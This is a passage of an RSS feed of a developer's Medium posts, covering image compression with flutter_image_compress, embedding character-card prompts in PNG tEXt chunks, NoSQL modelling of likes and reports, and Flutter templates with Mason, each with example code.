But the result is likely to be worse if the resolution differs a lot from the original input source.</p><h4>MusePose Demos You Can Try</h4><p>Here’s where you can try MusePose:</p><ul><li><a href="https://github.com/TMElyralab/Comfyui-MusePose">ComfyUI-MusePose</a> <br>- ComfyUI custom node</li><li><a href="https://github.com/jhj0517/stable-diffusion-webui-MusePose">stable-diffusion-webui-MusePose</a><br>- SD WebUI extension</li><li><a href="https://github.com/jhj0517/MusePose-WebUI">MusePose-WebUI</a><br>- A Gradio WebUI dedicated to MusePose, with a <a href="https://huggingface.co/spaces/jhj0517/musepose">Huggingface Space</a> &amp; a <a href="https://colab.research.google.com/github/jhj0517/MusePose-WebUI/blob/main/notebook/musepose_webui.ipynb">Colab Notebook</a> you can try.</li></ul><h3>Reference</h3><ul><li><a href="https://github.com/IDEA-Research/DWPose">IDEA-Research/DWPose: “Effective Whole-body Pose Estimation with Two-stages Distillation” (ICCV 2023, CV4Metaverse Workshop) (github.com)</a></li><li><a href="https://github.com/Megvii-BaseDetection/YOLOX">Megvii-BaseDetection/YOLOX: YOLOX is a high-performance anchor-free YOLO, exceeding yolov3~v5 with MegEngine, ONNX, TensorRT, ncnn, and OpenVINO supported. Documentation: https://yolox.readthedocs.io/ (github.com)</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=b31f9025a30d" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Compressing Image in Flutter]]></title>
            <link>https://medium.com/@developerjo0517/compressing-image-in-flutter-dd790b12b1c9?source=rss-d5fe4e536d4e------2</link>
            <guid isPermaLink="false">https://medium.com/p/dd790b12b1c9</guid>
            <category><![CDATA[flutter]]></category>
            <category><![CDATA[image-compression]]></category>
            <dc:creator><![CDATA[0517 jhj]]></dc:creator>
            <pubDate>Thu, 23 May 2024 15:29:28 GMT</pubDate>
            <atom:updated>2024-05-23T15:30:25.499Z</atom:updated>
<content:encoded><![CDATA[<p>There are two ways to compress images in Flutter:</p><ol><li><a href="https://github.com/flutter/packages/tree/main/packages/image_picker/image_picker">image_picker</a></li><li><a href="https://github.com/fluttercandies/flutter_image_compress?tab=readme-ov-file#platform-features">flutter_image_compress</a></li></ol><p>Fortunately, someone has already tested these packages in a <a href="https://stackoverflow.com/a/64690920/16626322">Stack Overflow post</a>. The test was done 4 years ago, but thanks to that post I found that <a href="https://github.com/fluttercandies/flutter_image_compress?tab=readme-ov-file#platform-features">flutter_image_compress</a> is still the best and most efficient way to compress images in Flutter. Here are my results with flutter_image_compress:</p><h4>Results</h4><ol><li><strong>100% (2.07 MB)</strong></li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*J7tAzEhQgxiWluTgeZEBQA.jpeg" /><figcaption>2.07 MB image from <a href="https://unsplash.com/ko/%EC%82%AC%EC%A7%84/%EC%9D%BC%EB%B0%98%EC%A0%81%EC%9D%B8-%ED%95%B4%EB%B0%94%EB%9D%BC%EA%B8%B0%EC%9D%98-%EA%B7%BC%EC%A0%91-%EC%82%AC%EC%A7%84-5lRxNLHfZOY">Unsplash</a></figcaption></figure><p>This is the original image without any compression.</p><p>2. <strong>95% (803 KB)</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*QFCP4qFD-5rrsTYoYW2xGg.jpeg" /><figcaption>803KB</figcaption></figure><p>When I decreased the image quality by only 5%, the size was compressed by more than 50%, 2MB → 803KB. The flower still looks the same, but the gray gradation in the background is slightly noticeable.</p><p>3. <strong>50% (319KB)</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-DL1uIWOZP20HaB3-rPrIQ.jpeg" /><figcaption>319KB</figcaption></figure><p>The image was compressed significantly, 2MB → 300KB. 
About the changes: The gray gradation on the background is noticeable, but the flower still looks the same.</p><p>3. <strong>10%</strong> <strong>(99.4KB)</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*CtggMxL8GHtGeYmFMGyu5g.jpeg" /><figcaption>99KB</figcaption></figure><p>The gray gradation on the background became more noticeable. At 10% quality, you can see a little blur on the flower if you look closely.</p><p>4. <strong>5% (60KB)</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8cAJce5Me5gOxqjJKZkNvw.jpeg" /><figcaption>60KB</figcaption></figure><p>Now the image is only 60KB and quite corrupted.</p><p>The default value of the image quality is 95% in the compressAndGetFile(). It only decrease by 5% of the image, but it showed decent compression ratio when it comes to the size, from 2MB → 803KB. And images look the same up to 50% in my opinion. I believe this is really useful package if you need to compress the image in the Flutter.</p><h4>Implementation in Flutter</h4><p>Add flutter_image_compress in the pubspec.yaml :</p><pre>dependencies:<br>  flutter_image_compress: ^2.3.0</pre><p>You can compress it to the temp directory and then handle the image there:</p><pre>import &#39;package:flutter_image_compress/flutter_image_compress.dart&#39;;<br>import &#39;package:path/path.dart&#39; as p;<br>import &#39;dart:io&#39;;<br><br>static Future&lt;XFile&gt; compressImage({<br>  required File imageFile,<br>  int quality=95,<br>  CompressFormat format=CompressFormat.jpeg,<br>}) async {<br>  final String targetPath = p.join(Directory.systemTemp.path, &#39;temp.${format.name}&#39;);<br>  final XFile? 
compressedImage = await FlutterImageCompress.compressAndGetFile(<br>    imageFile.path,<br>    targetPath,<br>    quality: quality,<br>    format: format<br>  );<br><br>  if (compressedImage == null) {<br>    throw Exception(&quot;Failed to compress the image&quot;);<br>  }<br><br>  return compressedImage;<br>}</pre><p>You can also specify the image format, such as CompressFormat.jpeg or CompressFormat.png. JPEG is usually the way to go because it offers the best quality for the same file size.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/360/1*Av0cUhjnLECsBng78_QhEw.gif" /><figcaption>Sample Usage App</figcaption></figure><p>If you want to see the code of the sample usage app above, please visit:</p><p><a href="https://github.com/jhj0517/flutter-samples/tree/master/compress_image">flutter-samples/compress_image at master · jhj0517/flutter-samples</a></p><h3>Reference</h3><ul><li><a href="https://stackoverflow.com/questions/58800808/flutter-the-best-way-to-compress-image">dart — Flutter the best way to compress image — Stack Overflow</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=dd790b12b1c9" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[How to Modify PNG Chunk Metadata in Flutter]]></title>
            <link>https://medium.com/@developerjo0517/how-to-modify-png-chunk-metadata-in-flutter-6dcc68cbd4a4?source=rss-d5fe4e536d4e------2</link>
            <guid isPermaLink="false">https://medium.com/p/6dcc68cbd4a4</guid>
            <category><![CDATA[png]]></category>
            <category><![CDATA[metadata]]></category>
            <category><![CDATA[flutter]]></category>
            <dc:creator><![CDATA[0517 jhj]]></dc:creator>
            <pubDate>Tue, 21 May 2024 14:09:48 GMT</pubDate>
            <atom:updated>2024-05-21T14:46:25.920Z</atom:updated>
            <content:encoded><![CDATA[<h4>Why Do I Need to Edit PNG Chunk Metadata?</h4><p>In the open source LLM community, there are many open source projects you can use: for example, <a href="https://github.com/open-webui/open-webui">open-webui</a>, <a href="https://github.com/oobabooga/text-generation-webui">text-generation-webui</a>, <a href="https://github.com/TavernAI/TavernAI">TavernAI</a>, etc. These open source projects let you explore LLMs by running a local model or using a remote API like the OpenAI API. All these open source projects are beautiful ingredients for the future of LLMs.</p><p>Particularly in web UIs such as <a href="https://github.com/TavernAI/TavernAI">TavernAI</a>, you can create a “character” with the personality you want (mostly by giving an initial prompt to the LLM) and chat with it. There are many such projects that allow you to chat with the character you made, and they often include a “character share” feature.</p><p>Such a feature is often implemented by embedding prompts in the PNG metadata.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/640/1*p6EU_qEPkb8nE0rb_i9I6A.png" /><figcaption>Example Character Image for Sharing</figcaption></figure><p>For example, the PNG image above has the following metadata in a tEXt type chunk, in JSON format:</p><pre>{<br>  &quot;spec&quot;: &quot;chara_card_v2&quot;,<br>  &quot;spec_version&quot;: &quot;2.0&quot;,<br>  &quot;data&quot;: {<br>    &quot;name&quot;: &quot;Sheepy&quot;,<br>    &quot;description&quot;: &quot;Your name is sheepy, the young sheep. 
Because you&#39;re a sheep, you only respond with words like &#39;meeeeh-!&#39;, &#39;meh&#39;, etc.&quot;,<br>    &quot;personality&quot;: &quot;&quot;,<br>    &quot;scenario&quot;: &quot;&quot;,<br>    &quot;first_mes&quot;: &quot;&quot;,<br>    &quot;mes_example&quot;: &quot;&quot;,<br>    &quot;creator_notes&quot;: &quot;&quot;,<br>    &quot;system_prompt&quot;: &quot;&quot;,<br>    &quot;post_history_instructions&quot;: &quot;&quot;,<br>    &quot;alternate_greetings&quot;: [],<br>    &quot;character_book&quot;: {<br>      &quot;extensions&quot;: {},<br>      &quot;entries&quot;: []<br>    },<br>    &quot;tags&quot;: [],<br>    &quot;creator&quot;: &quot;&quot;,<br>    &quot;character_version&quot;: &quot;&quot;,<br>    &quot;extensions&quot;: {}<br>  }<br>}</pre><p>It includes various information about the character in JSON format. When a user brings this character image to the open source project, the project will extract the tEXt chunk metadata from the image and embed the character information in the prompts sent to the LLM. That’s how the character sharing feature is implemented in such open-source projects.</p><p>Since prompts are just string data, tiny compared to the image itself, sharing the character as a PNG image with the prompts embedded in its metadata makes sense.</p><p>When open source projects share characters with each other, if the metadata had a different format in each project, it would be difficult to share the characters. So the metadata follows a specific format called <a href="https://github.com/malfoyslastname/character-card-spec-v2?tab=readme-ov-file#proposed-fields">Character Card V2</a>. The example JSON above is in Character Card V2 format.</p><h4>Chunk Structure in PNG</h4><p>So embedding a tEXt type chunk in the PNG image is how the character sharing feature is implemented. 
In a PNG, each chunk has the following format:</p><pre>{<br>  Length (4 bytes),         # Size of the Chunk Data<br>  Chunk Type (4 bytes),     # Type of the Chunk<br>  Chunk Data (Length bytes),# Data of the Chunk<br>  CRC (4 bytes)             # Used to detect corrupted or altered data<br>}</pre><p>A PNG file has image data chunks (mostly with the IDAT type) between the IHDR (Header) and IEND (Footer) type chunks. An example is as follows:</p><pre>[<br>Length:          Length of the Chunk<br>Chunk Type:      IHDR<br>Chunk Data:      (Width, Height, Bit depth, Color type, Compression, Filter, Interlace)<br>CRC:             (4 bytes),<br><br>Length:          Length of the Chunk<br>Chunk Type:      IDAT<br>Chunk Data:      (image data)<br>CRC:             (4 bytes),<br><br>Length:          0<br>Chunk Type:      IEND<br>Chunk Data:      (0 byte)<br>CRC:             (4 bytes)<br>]</pre><p>What we need to do is insert a tEXt type chunk between the IHDR and IEND chunks.</p><h4>Implementation in Flutter</h4><p>Add packages to pubspec.yaml:</p><pre>  png_chunks_encode: ^1.0.0<br>  png_chunks_extract: ^1.0.2</pre><p><a href="https://github.com/FlutterFans/png_chunks_encode">png_chunks_encode</a> and <a href="https://github.com/FlutterFans/png_chunks_extract">png_chunks_extract</a> are packages that decode a PNG into chunks and encode chunks back into a PNG.</p><p>Read the PNG chunks from the image with:</p><pre>import &#39;dart:typed_data&#39;;<br>import &#39;package:flutter/foundation.dart&#39;;<br>import &#39;package:png_chunks_extract/png_chunks_extract.dart&#39; as pngExtract;<br><br>List&lt;Map&lt;String, dynamic&gt;&gt;? 
readPNGChunks({<br>  required Uint8List blob<br>}) {<br>  try {<br>    return pngExtract.extractChunks(blob);<br>  } catch (e) {<br>    debugPrint(&quot;Reading Chunk Failed $e&quot;);<br>    return null;<br>  }<br>}</pre><p>This will return a List like the following:</p><pre>[<br>  { name: &#39;IHDR&#39;, data: Uint8List([...]) },<br>  { name: &#39;IDAT&#39;, data: Uint8List([...]) },<br>  { name: &#39;IDAT&#39;, data: Uint8List([...]) },<br>  { name: &#39;IDAT&#39;, data: Uint8List([...]) },<br>  { name: &#39;IDAT&#39;, data: Uint8List([...]) },<br>  { name: &#39;IEND&#39;, data: Uint8List([]) }<br>]</pre><p>We will insert the tEXt type chunk between the IHDR and IEND types in this list. According to the <a href="https://www.w3.org/TR/PNG-Chunks.html">W3C</a>, a tEXt chunk’s data contains a “keyword” and the text, separated by a zero byte (null separator). So insert it in that specific format.</p><pre>import &#39;dart:typed_data&#39;;<br>import &#39;package:png_chunks_encode/src/etc32.dart&#39;;<br>import &#39;dart:convert&#39;;<br><br>List&lt;Map&lt;String, dynamic&gt;&gt; addtEXtChunk({<br>  required List&lt;Map&lt;String, dynamic&gt;&gt; chunks,<br>  required String keyword,<br>  required String text,<br>}) {<br>  List&lt;int&gt; tEXtData = [...utf8.encode(keyword), 0, ...utf8.encode(text)];<br><br>  Uint8List chunkType = Uint8List.fromList(utf8.encode(&#39;tEXt&#39;));<br>  Uint8List dataBytes = Uint8List.fromList(tEXtData);<br>  Uint8List crcInput = Uint8List.fromList([...chunkType, ...dataBytes]);<br>  int crc = Crc32.getCrc32(crcInput);<br><br>  Map&lt;String, dynamic&gt; tEXtChunk = {<br>    &#39;name&#39;: &#39;tEXt&#39;,<br>    &#39;data&#39;: dataBytes,<br>    &#39;crc&#39;: crc<br>  };<br><br>  int end = chunks.indexWhere((c) =&gt; c[&#39;name&#39;] == &#39;IEND&#39;);<br>  chunks.insert(end, tEXtChunk);<br>  return chunks;<br>}</pre><p>The keyword and the text are separated by a zero byte, and the new chunk is inserted just before IEND in this function. 
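As a language-agnostic cross-check (this sketch is not part of the Flutter sample; the helper name build_text_chunk and the sample values are illustrative only), the full on-disk byte layout of such a tEXt chunk can be written out in a few lines of Python:

```python
import struct
import zlib

def build_text_chunk(keyword: str, text: str) -> bytes:
    """Serialize a PNG tEXt chunk: length + type + (keyword, 0, text) + CRC."""
    # Keyword and text are separated by a single zero byte (null separator).
    data = keyword.encode("latin-1") + b"\x00" + text.encode("latin-1")
    chunk_type = b"tEXt"
    # The 4-byte big-endian length counts only the data bytes,
    # and the CRC covers the chunk type plus the data (not the length).
    length = struct.pack(">I", len(data))
    crc = struct.pack(">I", zlib.crc32(chunk_type + data) & 0xFFFFFFFF)
    return length + chunk_type + data + crc

chunk = build_text_chunk("chara", "{\"spec\": \"chara_card_v2\"}")
```

Note that the CRC input here (type bytes followed by data bytes) matches the crcInput built in the Dart function above.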
Now, encode this chunk back to PNG.</p><pre>import &#39;package:path/path.dart&#39; as p;<br>import &#39;package:png_chunks_encode/png_chunks_encode.dart&#39; as pngEncode;<br><br>static Future&lt;void&gt; saveChunkToPNG({<br>    required List&lt;Map&lt;String, dynamic&gt;&gt; chunk,<br>  }) async {<br>  final newBuffer = pngEncode.encodeChunks(chunk);<br>  final file = File(p.join(Directory.systemTemp.path, &#39;image.png&#39;));<br>  await file.create();<br>  await file.writeAsBytes(newBuffer);<br>}</pre><p>The image is successfully saved with the new chunk. Here’s the full demonstration of modifying PNG chunks in the sample app:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/360/1*SkOYk-QyH82fC4JNVopiEw.gif" /></figure><p>If you’re interested in the sample app code, please visit:</p><p><a href="https://github.com/jhj0517/flutter-samples">GitHub - jhj0517/flutter-samples: Practice Projects for Flutter</a></p><h3>Reference</h3><ul><li><a href="https://github.com/malfoyslastname/character-card-spec-v2">malfoyslastname/character-card-spec-v2: An updated specification for AI character cards. (github.com)</a></li><li><a href="https://www.w3.org/TR/PNG-Chunks.html">PNG Specification: Chunk Specifications (w3.org)</a></li><li><a href="https://cloudsecurityalliance.org/blog/2022/05/04/what-is-a-blob-binary-large-object-can-it-be-tokenized">What is a BLOB (Binary Large Object)? Can it be Tokenized? | CSA (cloudsecurityalliance.org)</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=6dcc68cbd4a4" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Modeling Social Likes & Reports in NoSQL]]></title>
            <link>https://medium.com/@developerjo0517/modeling-social-likes-reports-in-nosql-d23c78fcf179?source=rss-d5fe4e536d4e------2</link>
            <guid isPermaLink="false">https://medium.com/p/d23c78fcf179</guid>
            <category><![CDATA[nosql]]></category>
            <category><![CDATA[database]]></category>
            <dc:creator><![CDATA[0517 jhj]]></dc:creator>
            <pubDate>Thu, 09 May 2024 10:11:54 GMT</pubDate>
            <atom:updated>2025-01-12T16:47:30.043Z</atom:updated>
            <content:encoded><![CDATA[<h4>Follow a query-driven design approach</h4><p>When you model a NoSQL database, you should always follow a query-driven design approach. Unlike in an RDBMS, you shouldn’t have to query multiple keys to get specific data. For example, if you were modeling social “likes” in an RDBMS, you would create multiple tables with foreign keys like this:</p><pre>CREATE TABLE posts (<br>  id INTEGER PRIMARY KEY AUTOINCREMENT,<br>  content TEXT NOT NULL,<br>  author TEXT NOT NULL,<br>  likes_number INTEGER NOT NULL<br>);<br><br>CREATE TABLE likes (<br>  id INTEGER PRIMARY KEY AUTOINCREMENT,<br>  post_id INTEGER REFERENCES posts(id),<br>  user TEXT NOT NULL<br>);</pre><p>Unless you join the tables, you have to query the posts table → then query the likes table to know who liked a post. In NoSQL, you shouldn’t set multiple “parent” nodes like you do in an RDBMS.</p><pre>// Avoid these two parent nodes<br>{<br>  &quot;posts&quot;: {<br>    &quot;post_id1&quot;: {<br>      &quot;content&quot;: &quot;Hello&quot;,<br>      &quot;author&quot;: &quot;james&quot;,<br>      &quot;likes_number&quot;: 1<br>    }<br>  },<br>  &quot;likes&quot;: {<br>    &quot;like_id1&quot;: {<br>      &quot;post_id&quot;: &quot;post_id1&quot;<br>    }<br>  }<br>}</pre><p>Instead, you can embed likes within posts, creating posts as nested objects.</p><pre>// Do this instead.<br>{<br>  &quot;posts&quot;: {<br>    &quot;post_id1&quot;: {<br>      &quot;content&quot;: &quot;Hello&quot;,<br>      &quot;author&quot;: &quot;james&quot;,<br>      &quot;likes_number&quot;: 1,<br>      &quot;likes&quot;: [&quot;like_id1&quot;]<br>    }<br>  }<br>}</pre><p>You can tell who liked the post by querying only the post. No need to query post → likes, because the likes data is already included in the post when you fetch the post data. 
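To make the single-fetch idea concrete, here is a minimal Python sketch, with a plain dict standing in for the document store (the layout mirrors the embedded example above; the helper name get_post is illustrative, not tied to any particular NoSQL product):

```python
# A plain dict standing in for the NoSQL document store,
# shaped like the embedded "likes" example above.
posts = {
    "post_id1": {
        "content": "Hello",
        "author": "james",
        "likes_number": 1,
        "likes": ["like_id1"],
    }
}

def get_post(post_id: str) -> dict:
    # A single fetch returns the post together with its embedded likes;
    # no second query against a separate "likes" collection is needed.
    return posts[post_id]

post = get_post("post_id1")
print(post["likes"])  # the like ids are already embedded in the post
```

Everything about the post, including its likes, comes back from one lookup.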
Whereas data in an RDBMS is separated into multiple tables for normalization, NoSQL often relies on the concept of “nested objects” instead.</p><p>The important consideration when modeling data in NoSQL is to use a query-driven design approach, so that fetching a post once tells you as much as possible about its related data. Just like embedding likes in a post, you can also embed reports in a post.</p><pre>{<br>  &quot;posts&quot;: {<br>    &quot;post_id1&quot;: {<br>      &quot;content&quot;: &quot;Hello&quot;,<br>      &quot;author&quot;: &quot;james&quot;,<br>      &quot;likes_number&quot;: 1,<br>      &quot;likes&quot;: [&quot;like_id1&quot;],<br>      &quot;reports_number&quot;: 1,<br>      &quot;reports&quot;: [{&quot;id&quot;: &quot;reports_id1&quot;, &quot;reason&quot;: &quot;violence&quot;}]<br>    }<br>  }<br>}</pre><h3>Reference</h3><ul><li><a href="https://stackoverflow.com/questions/41527058/many-to-many-relationship-in-firebase">Many to Many relationship in Firebase — Stack Overflow</a></li><li><a href="https://www.scylladb.com/2023/09/06/5-nosql-data-modeling-guidelines-for-avoiding-performance-issues/">5 NoSQL Data Modeling Guidelines for Avoiding Performance Issues — ScyllaDB</a></li><li><a href="https://stackoverflow.com/questions/49983808/how-to-model-data-in-nosql-databases">mongodb — How to model data in noSql databases — Stack Overflow</a></li><li><a href="https://www.mongodb.com/docs/manual/data-modeling/concepts/embedding-vs-references/">Embedding vs. References (MongoDB Manual)</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=d23c78fcf179" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Start a New Flutter Project Using a Template with Mason]]></title>
            <link>https://medium.com/@developerjo0517/start-a-new-flutter-project-using-a-template-with-mason-fac7c4417288?source=rss-d5fe4e536d4e------2</link>
            <guid isPermaLink="false">https://medium.com/p/fac7c4417288</guid>
            <category><![CDATA[flutter]]></category>
            <category><![CDATA[masons]]></category>
            <dc:creator><![CDATA[0517 jhj]]></dc:creator>
            <pubDate>Fri, 26 Apr 2024 11:58:52 GMT</pubDate>
            <atom:updated>2024-06-19T14:16:54.785Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fhDpphd8TCBF4EkNN4XrlQ.png" /></figure><p><a href="https://github.com/felangel/mason">Mason</a> is an open-source tool that allows you to start a project with a template. While Mason is popular for Flutter templates because it’s mainly written in Dart, you can use it for any type of project, not just those based on Flutter.</p><h4>How Mason Works</h4><p>You can use variables like {{application_id}} in a template via <a href="https://mustache.github.io/mustache.5.html">mustache syntax</a> in Mason. The idea of Mason is to let you define the value of this variable when you start a project. For example, in Android, if you set the applicationId field in the app’s build.gradle with {{application_id}} like this,</p><pre>defaultConfig {<br>  applicationId &quot;{{application_id}}&quot;<br>}</pre><p>the {{application_id}} will be replaced with the value you define when you start a new project. So when you create a template for Flutter with Mason, you might want to embed mustache variables like {{application_id}} across all 6 platforms.</p><h4>How to Use Mason</h4><ol><li>Install Mason CLI</li></ol><pre>dart pub global activate mason_cli</pre><p>2. Implement Your Template in a Specific Folder Structure</p><pre>.<br>├── __brick__<br>│   └── {{project_name}}<br>│       ├── page1.dart<br>│       └── page2.dart  <br>└── brick.yaml</pre><p>You typically have a brick.yaml file and a __brick__ folder like this. The __brick__ folder is where you will implement and structure your template. In the example above, when you create a project with Mason, it will generate the {{project_name}} folder.</p><p>3. Write brick.yaml Configuration File</p><p>In Mason, the concept of a “brick” is used to metaphorically represent a template. You can set the configuration of your template in brick.yaml. 
The following file is an example brick.yaml:</p><pre>name: my_template<br>description: My Flutter Template<br><br>version: 0.1.0<br><br>environment:<br>  mason: &quot;&gt;=0.1.0-dev.52 &lt;0.1.0&quot;<br><br>vars:<br>  project_name:<br>    type: string<br>    description: Project name<br>    default: project_name<br>    prompt: What is the project name?<br>  package_name:<br>    type: string<br>    description: Package name<br>    default: com.example.myapp<br>    prompt: What is the package name?</pre><p>Specify the variables like {{project_name}} and {{package_name}} that you used in the template in brick.yaml like this.</p><p>4. Add Brick</p><p>Add the brick so you can use it anywhere.</p><pre>mason add -g my_template --path ./</pre><p>Specify the --path option to indicate where your brick.yaml is located.</p><p>5. List Brick</p><pre>mason ls -g<br>├── my_template 0.1.0</pre><p>Check that your brick is added correctly.</p><p>6. Make Brick</p><pre>mason make my_template</pre><p>Now you can use the template anywhere with the above command. 
It will ask you to define the values of the variables like {{package_name}} that you specified in brick.yaml.</p><h4>Embedding mustache variables for Flutter</h4><p>When crafting a template for Flutter projects using Mason, you might need to include a mustache variable such as {{application_id}} across all 6 supported platforms, like this:</p><ul><li>Android</li></ul><p>in AndroidManifest, MainActivity, build.gradle (app-level):</p><pre>// AndroidManifest<br>&lt;application<br>        android:label=&quot;{{project_name.titleCase()}}&quot;<br>/&gt;<br><br>// MainActivity<br>package {{application_id}}<br><br>// build.gradle<br>android {<br>    namespace &quot;{{application_id}}&quot;<br>    defaultConfig {<br>      applicationId &quot;{{application_id}}&quot;<br>    }<br>}</pre><ul><li>iOS</li></ul><p>in project.pbxproj, Info.plist:</p><pre>// project.pbxproj<br>PRODUCT_BUNDLE_IDENTIFIER = {{application_id}}; // Update every field<br><br>// Info.plist<br> &lt;key&gt;CFBundleName&lt;/key&gt;<br> &lt;string&gt;{{project_name}}&lt;/string&gt;<br> &lt;key&gt;CFBundleDisplayName&lt;/key&gt;<br> &lt;string&gt;{{project_name}}&lt;/string&gt;</pre><ul><li>macOS</li></ul><p>in project.pbxproj, Runner.xcscheme:</p><pre>// project.pbxproj<br>PRODUCT_BUNDLE_IDENTIFIER = {{application_id}}.RunnerTests; // Update every field<br><br>// Runner.xcscheme<br>BuildableName = &quot;{{project_name.titleCase()}}.app&quot; // Update every field</pre><ul><li>Web</li></ul><p>in index.html, manifest.json:</p><pre>// index.html<br>&lt;title&gt;{{project_name.titleCase()}}&lt;/title&gt;<br><br>// manifest.json<br>&quot;name&quot;: &quot;{{project_name.titleCase()}}&quot;</pre><ul><li>Windows</li></ul><p>in CMakeLists.txt:</p><pre>set(BINARY_NAME &quot;{{project_name.snakeCase()}}&quot;)</pre><ul><li>Linux</li></ul><p>in CMakeLists.txt:</p><pre>set(BINARY_NAME &quot;{{project_name.snakeCase()}}&quot;)</pre><p>I made a base template for Flutter projects that embeds 
variables like this. You can start making a template from this base. It’s only built &amp; tested on Android for now, but if you’re still interested, please visit:</p><p><a href="https://github.com/jhj0517/flutter_template_starter">GitHub - jhj0517/flutter_template_starter</a></p><h3>Reference</h3><ul><li><a href="https://docs.brickhub.dev/">🚀 Overview | BrickHub Docs</a></li><li><a href="https://github.com/VeryGoodOpenSource/very_good_templates">VeryGoodOpenSource/very_good_templates (GitHub)</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=fac7c4417288" width="1" height="1" alt="">]]></content:encoded>
        </item>
    </channel>
</rss>